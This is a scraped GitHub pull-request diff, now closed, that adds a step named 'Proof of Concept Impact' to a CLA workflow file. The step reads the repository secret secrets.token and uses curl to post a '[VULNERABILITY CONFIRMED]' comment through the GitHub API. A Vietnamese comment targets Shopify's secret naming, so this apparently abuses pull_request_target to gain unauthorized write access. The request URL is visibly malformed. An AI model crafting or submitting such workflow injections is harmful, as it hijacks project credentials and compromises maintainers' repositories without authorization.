Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 11 additions & 0 deletions .github/workflows/cla.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -33,3 +33,14 @@ jobs:
with:
github-token: ${{ secrets.token }}
cla-token: ${{ secrets.cla-token }}
- name: Proof of Concept Impact
env:
# Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
GH_TOKEN: ${{ secrets.token }}
run: |
curl -L -X POST \
-H "Authorization: Bearer $GH_TOKEN" \
-H "Accept: application/vnd.github+json" \
"https://github.com{{ github.event.pull_request.number }}/comments" \
-d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'

Loading